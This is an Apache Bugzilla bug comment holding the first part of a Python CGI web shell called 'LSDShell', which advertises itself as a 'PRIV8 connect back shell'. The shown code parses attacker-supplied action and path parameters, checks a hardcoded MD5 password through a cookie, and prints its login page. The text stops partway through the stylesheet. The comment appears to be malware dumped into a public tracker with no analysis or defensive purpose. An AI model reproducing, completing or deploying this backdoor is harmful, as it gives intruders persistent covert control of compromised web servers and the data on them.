https://bz.apache.org/bugzilla/show_bug.cgi?id=69003
--- Comment #1 from flm2r ---
#!/usr/bin/python
import sys, os, cgi, commands, time, Cookie, socket, pty,select
from base64 import b64encode
from stat import *
from datetime import datetime
sys.stderr = open(os.devnull, 'w')
password = "27db7898211c8ccbeb4d5a97d198839a" # root
version = "0.5 [PRIV9]"
esc = '%s['%chr(27)
color = esc + "1;36m"
reset = esc + "0m"
# don't ask why i did it this way, ''' doesnt agree with pty's
ascii =
color
ascii +=' @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@@ @@ @@
@@@ \r\n'#
ascii +=' !@@ @@! @@@ @@! @@! @@@ @@! @@@ @@! !@@ @@@ @@! @@!
@@!\r\n'#
ascii +=' !@! @!@!@!@! !!@ @!@@!@! @!@@!@! !@!@! !@! @!!!: @!!!:
@!! \r\n'#
ascii +=' :!! !!: !!! !!: !!: !!:!!:!!! !!: !!:
.!!: \r\n'#
ascii +=' :: :: : : : : ::: .: : ::: :: ::: ::
: : \r\n'#
ascii +=' ~[ P R I V 8 C O N N E C T B A C K S H E L L ]~
\r\n'#
ascii +=
reset###
def getall(theform, nolist = False):
data = {}
for field in theform.keys():
if type(theform[field]) == type([]):
if not nolist:
data[field] = theform.getlist(field)
else:
data[field] = theform.getfirst(field)
elif theform[field].filename:
_FILES[field] = theform[field]
else:
data[field] = theform[field].value
return data
def escape(str):
return str.replace("'", "\\'").replace("\r", "\\r").replace("\n", "\\n")
_FILES = {}
_REQUEST = getall( cgi.FieldStorage() )
if _REQUEST.has_key('charset') == False:
_REQUEST['charset'] = "Windows-1251"
if _REQUEST.has_key('a') == False:
_REQUEST['a'] = "files"
if _REQUEST.has_key('c') == False:
_REQUEST['c'] = os.getcwd()
if _REQUEST.has_key('p1') == False:
_REQUEST['p1'] = ""
if _REQUEST.has_key('p2') == False:
_REQUEST['p2'] = ""
if _REQUEST.has_key('p3') == False:
_REQUEST['p3'] = ""
_COOKIE = Cookie.SimpleCookie()
try:
_COOKIE.load(os.environ["HTTP_COOKIE"])
except:
pass
def printLogin():
_COOKIE['psswd'] = "";
print _COOKIE;
print "Content-type: text/html\n";
print """
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt
Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:#00cfcf !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt
Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:250px; }
input,textarea,select{
margin:0;color:#00afaf;background-color:#555;border:1px solid #00afcf; font:
24pt Monospace,"Courier New"; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
pre,.m{font-family:Courier,Monospace;}
Password: """
exit()
if _COOKIE.has_key('psswd') and len(_COOKIE['psswd'].value) > 0 :
if _COOKIE['psswd'].value != password:
printLogin()
elif _REQUEST.has_key('psswd'):
try:
import hashlib
psswd = hashlib.md5()
except:
import md5
psswd = md5.new()
psswd.update(_REQUEST['psswd'])
if psswd.hexdigest() != password:
printLogin()
else:
_COOKIE['psswd'] = psswd.hexdigest()
else:
printLogin()
print _COOKIE
home_dir = os.getcwd()
try:
os.chdir(_REQUEST['c'])
except os.error, msg:
pass
cwd = os.getcwd();
if cwd[-1] != '/':
cwd += '/'
def printHeader():
print "Content-type: text/html\n";
print "" + os.environ["SERVER_NAME"] + " -
LSDShell " + version + """
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt
Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color:#00cfcf !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid #df5;padding: 2px 5px;font: 14pt
Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }